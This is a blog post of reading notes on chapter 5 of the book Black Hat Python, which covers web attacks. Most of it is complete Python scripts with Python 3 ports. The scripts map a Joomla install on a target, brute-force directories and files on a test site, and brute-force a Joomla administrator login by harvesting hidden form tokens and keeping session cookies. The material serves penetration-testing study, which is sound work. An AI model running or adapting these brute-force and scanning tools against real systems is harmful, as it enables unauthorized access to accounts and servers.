Black Hat Python Reading Notes: Web Attacks

Posted by 思源湖的鱼

Preface

These are my reading notes for Black Hat Python: Python Programming for Hackers and Pentesters (《Python黑帽子:黑客与渗透测试编程之道》). They include the source code from the book, some of which I have rewritten for Python 3. The book is fairly old by now, but anyway, it is still a very good one.

This post covers Chapter 5 on web attacks: the urllib2 library, mapping open-source web application installations, brute-forcing directories and file locations, and brute-forcing HTML form authentication.

1. urllib2

Writing tools that interact with web services requires the urllib2 library.

Let's take a quick look at how to build a GET request and set a custom User-Agent:

#!/usr/bin/env python
#-*- coding:utf8 -*-

import urllib2

url = "http://www.360.cn/"

headers={}
# Googlebot is Google's web crawler user-agent
headers['User-Agent'] = "Googlebot"

request = urllib2.Request(url,headers=headers)
response = urllib2.urlopen(request)

print response.read()
response.close()
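
Since the preface mentioned porting some examples to Python 3, here is a minimal Python 3 sketch of the same request: urllib2 is replaced by urllib.request, and read() now returns bytes (the page is assumed to decode as UTF-8).

#!/usr/bin/env python3
# -*- coding:utf8 -*-

import urllib.request

url = "http://www.360.cn/"

headers = {}
# Googlebot is Google's web crawler user-agent
headers['User-Agent'] = "Googlebot"

request = urllib.request.Request(url, headers=headers)
response = urllib.request.urlopen(request)

# read() returns bytes in Python 3, so decode before printing
print(response.read().decode("utf-8", errors="replace"))
response.close()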

2. Mapping open-source web app installations

It is essentially a scanner: it walks a local copy of the web application and requests each of those files from the remote target to see which ones exist there.

#!/usr/bin/env python
#-*- coding:utf8 -*-

import Queue
import threading
import os
import urllib2

threads = 10

# the target we are interested in
target = "http://192.168.1.105/Joomla/"
directory = "./Joomla/"
filters = [".jpg", ".gif", ".png", ".css"]

os.chdir(directory)
web_paths = Queue.Queue()

# walk the local install directory
for r,d,f in os.walk("."):
    for files in f:
        remote_path = "%s/%s" % (r,files)
        if remote_path.startswith("."):
            remote_path = remote_path[1:]
        if os.path.splitext(files)[1] not in filters:
            web_paths.put(remote_path)

def test_remote():
    while not web_paths.empty():
        path = web_paths.get()
        url = "%s%s" % (target, path)

        request = urllib2.Request(url)

        try:
            response = urllib2.urlopen(request)
            content = response.read()

            print "[%d] => %s" % (response.code, path)
            response.close()

        except urllib2.HTTPError as error:
            print "Failed %s" % error.code
            pass

for i in range(threads):
    print "Spawning thread %d" % i
    t = threading.Thread(target=test_remote)
    t.start()
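
The script above only spawns the workers and lets them run. A small variation of the same spawning loop, reusing the test_remote function and thread count defined above, keeps the Thread objects and joins them so the script can report when the whole scan has finished:

thread_list = []

for i in range(threads):
    print "Spawning thread %d" % i
    t = threading.Thread(target=test_remote)
    t.start()
    thread_list.append(t)

# wait for every worker to drain the queue before reporting
for t in thread_list:
    t.join()

print "Scan complete."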

3. Brute-forcing directories and file locations

A simple directory brute-forcer:

#!/usr/bin/env python
#-*- coding:utf8 -*-
  
import urllib2  
import threading  
import Queue  
import urllib  
  
threads = 50  
target_url = "http://testphp.vulnweb.com"  
wordlist_file = "./all.txt"  # a wordlist such as those shipped with SVNDigger or DirBuster
resume = None   # per the author, this resumes from the last attempted word after a network interruption instead of starting over; it does not actually seem to be used here
user_agent = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.80 Safari/537.36"  
  
  
def built_wordlist(wordlist_file):  
    # read in the wordlist file
    fd = open(wordlist_file, "rb")  
    raw_words = fd.readlines()  
    fd.close()  
  
    found_resume = False  
    words = Queue.Queue()  
  
    for word in raw_words:  
        # strip trailing whitespace
        word = word.rstrip()
        # if we are resuming a previous run
        if resume is not None:  
  
            if found_resume:  
                words.put(word)  
            else:  
                if word == resume:  
                    found_resume = True  
                    print "Resuming wordlist from: %s" % resume  
        else:  
            words.put(word)  
    return words  
  
def dir_bruter(word_queue, extentsions=None):  
  
    while not word_queue.empty():  
        attempt = word_queue.get() 

        # holds the URL variants we will try
        attempt_list = []  
  
        # check for a file extension: none means a directory to brute-force, otherwise a file
        if "." not in attempt:  
            attempt_list.append("/%s/" % attempt)  
        else:  
            attempt_list.append("/%s" % attempt)  
  
        # if we also want to brute-force extensions
        if extentsions:  
            for extentsion in extentsions:  
                attempt_list.append("/%s%s" % (attempt, extentsion))  
  
        # iterate over the attempts
        for brute in attempt_list:
            # build the URL
            url = "%s%s" % (target_url, urllib.quote(brute))  
            #print url  
            try:  
                headers = {}  
                headers['User-Agent'] = user_agent  
                r = urllib2.Request(url, headers=headers)  
  
                response = urllib2.urlopen(r)  
                #print response.__dict__
                if len(response.read()):  
                    print "[%d] => %s" % (response.code, url) 
            # catch the URLError as e
            except urllib2.URLError as e:
                # the code attribute exists and it is not a 404
                if hasattr(e, 'code') and e.code != 404:  
                    print "!!! %d => %s" % (e.code, url)  
                pass  
  
  
word_queue = built_wordlist(wordlist_file)  
extentsions = [".php", ".bak", ".orig",".inc"]  

# start the multithreaded scan
for i in range(threads):  
    t = threading.Thread(target=dir_bruter, args=(word_queue, extentsions))  
    t.start()  
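
As a rough Python 3 porting guide, here is a minimal sketch of the request step inside dir_bruter: urllib2 becomes urllib.request / urllib.error and urllib.quote becomes urllib.parse.quote. The try_url helper and the hard-coded path it is called with are only for illustration.

#!/usr/bin/env python3
# -*- coding:utf8 -*-

import urllib.request
import urllib.error
import urllib.parse

target_url = "http://testphp.vulnweb.com"
user_agent = "Mozilla/5.0"   # any browser-like string works; the full one above can be reused

def try_url(brute):
    # build the URL exactly as the Python 2 version does
    url = "%s%s" % (target_url, urllib.parse.quote(brute))
    headers = {'User-Agent': user_agent}
    request = urllib.request.Request(url, headers=headers)
    try:
        response = urllib.request.urlopen(request)
        if len(response.read()):
            print("[%d] => %s" % (response.status, url))
    except urllib.error.HTTPError as e:
        # HTTPError always carries a code; anything other than 404 is interesting
        if e.code != 404:
            print("!!! %d => %s" % (e.code, url))

try_url("/admin/")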

4. Brute-forcing HTML form authentication

This is an example of brute-forcing a Joomla administrator login. Two details matter:

  • retrieve the hidden token before submitting the password
  • set cookies through a urllib2 opener so the session is maintained between the two requests

(Screenshot: the Joomla administrator login form.)

#!/usr/bin/env python
#-*- coding:utf8 -*-

import urllib2
import urllib
import cookielib
import threading
import sys
import Queue

from HTMLParser import HTMLParser

# general settings
user_thread = 10
username = "giantbranch"
wordlist_file = "./mydict.txt"
resume = None

# target-specific settings
target_url = "http://192.168.1.105/Joomla/administrator/index.php"
target_post = "http://192.168.1.105/Joomla/administrator/index.php"

username_field = "username"
password_field = "passwd"

# after a successful login the page title contains the text below (only when the site language is English)
success_check = "Administration - Control Panel"

class BruteParser(HTMLParser):
    def __init__(self):
        HTMLParser.__init__(self)
        # dictionary for the parsed results
        self.tag_results = {}

    # when feed() is handed the whole HTML document, this method is called for every start tag encountered (as the name suggests)
    def handle_starttag(self, tag, attrs):
        # we only care about input tags
        if tag == "input":
            tag_name = None
            tag_value = None
            for name,value in attrs:
                # an input tag has name, value, type and other attributes; we only need name and value
                if name == "name":
                    tag_name = value
                if name == "value":
                    tag_value = value
            # once all attributes have been seen, store the name/value pair
            if tag_name is not None:
                self.tag_results[tag_name] = tag_value

class Bruter(object):
    def __init__(self, username, words):
        self.username = username
        self.password_q = words
        self.found = False

        print "Finished setting up for %s" % username

    def run_bruteforce(self):
        for i in range(user_thread):
            t = threading.Thread(target=self.web_bruter)
            t.start()

    def web_bruter(self):
        while not self.password_q.empty() and not self.found:
            # get a password from the queue and strip trailing whitespace
            brute = self.password_q.get().rstrip()
            # a FileCookieJar holds the cookies for this attempt (its argument is the filename they could be saved to)
            jar = cookielib.FileCookieJar("cookies")
            # build a urllib2 opener around the jar so cookies set by the requests below are sent back automatically
            opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(jar))

            response = opener.open(target_url)

            page = response.read()

            print "Trying: %s : %s (%d left)" % (self.username, brute, self.password_q.qsize())

            # parse the hidden form fields
            parser = BruteParser()
            parser.feed(page)

            # now holds the hidden form fields' name/value pairs
            post_tags = parser.tag_results

            # add our username and password fields
            post_tags[username_field] = self.username
            post_tags[password_field] = brute

            # debug: dump the POST data (key/value pairs)
            # for key,value in post_tags.items():
            #     print key,':',value

            # URL-encode the POST data and attempt the login
            login_data = urllib.urlencode(post_tags)
            login_response = opener.open(target_post, login_data)
            login_result = login_response.read()

            # check whether the login succeeded
            if success_check in login_result:
                # set to True so every worker loop exits
                self.found = True

                print "[*] Bruteforce successful."
                print "[*] Username: %s" % username
                print "[*] Password: %s" % brute
                print "[*] Waiting for other threads to exit..."

def built_wordlist(wordlist_file):
    # read in the wordlist file
    fd = open(wordlist_file, "rb")
    raw_words = fd.readlines()
    fd.close()

    found_resume = False
    words = Queue.Queue()

    for word in raw_words:
        # strip trailing whitespace
        word = word.rstrip()
        # if we are resuming a previous run
        if resume is not None:

            if found_resume:
                words.put(word)
            else:
                if word == resume:
                    found_resume = True
                    print "Resuming wordlist from: %s" % resume
        else:
            words.put(word)
    return words

# build the word queue
words = built_wordlist(wordlist_file)

# instantiate the Bruter class
bruter_obj = Bruter(username, words)
# kick off the brute force
bruter_obj.run_bruteforce()
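
For a Python 3 port of this script, the moving parts map as follows: cookielib becomes http.cookiejar, HTMLParser moves to html.parser, Queue becomes queue, urllib.urlencode becomes urllib.parse.urlencode, and POST bodies must be bytes. The single-attempt sketch below shows the same token-and-cookie flow; the try_login helper and the credentials passed to it are only illustrative placeholders.

#!/usr/bin/env python3
# -*- coding:utf8 -*-

import http.cookiejar
import urllib.request
import urllib.parse
from html.parser import HTMLParser

target_url = "http://192.168.1.105/Joomla/administrator/index.php"
target_post = "http://192.168.1.105/Joomla/administrator/index.php"
username_field = "username"
password_field = "passwd"
success_check = "Administration - Control Panel"

class BruteParser(HTMLParser):
    # collect the name/value pairs of every input tag, hidden token included
    def __init__(self):
        HTMLParser.__init__(self)
        self.tag_results = {}

    def handle_starttag(self, tag, attrs):
        if tag == "input":
            attrs = dict(attrs)
            if "name" in attrs:
                self.tag_results[attrs["name"]] = attrs.get("value", "")

def try_login(username, password):
    # a fresh cookie jar per attempt, as in the Python 2 version
    jar = http.cookiejar.CookieJar()
    opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(jar))

    # fetch the login page first so the session cookie and hidden token are issued
    page = opener.open(target_url).read().decode("utf-8", errors="replace")

    parser = BruteParser()
    parser.feed(page)
    post_tags = parser.tag_results

    post_tags[username_field] = username
    post_tags[password_field] = password

    # POST data must be URL-encoded and then encoded to bytes in Python 3
    login_data = urllib.parse.urlencode(post_tags).encode("utf-8")
    result = opener.open(target_post, login_data).read().decode("utf-8", errors="replace")
    return success_check in result

# hypothetical credentials, for illustration only
if try_login("giantbranch", "password123"):
    print("[*] Bruteforce successful.")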

Conclusion

This chapter is mainly about attacking web applications by scripting HTTP interactions with urllib2.
Because the book predates Python 3, that module is gone: it was split into urllib.request and urllib.error, and third-party libraries such as requests (built on urllib3, which adds thread-safe HTTP/1.1 connection pooling) are now the usual choice.
The examples above therefore need some adaptation for practical use today.
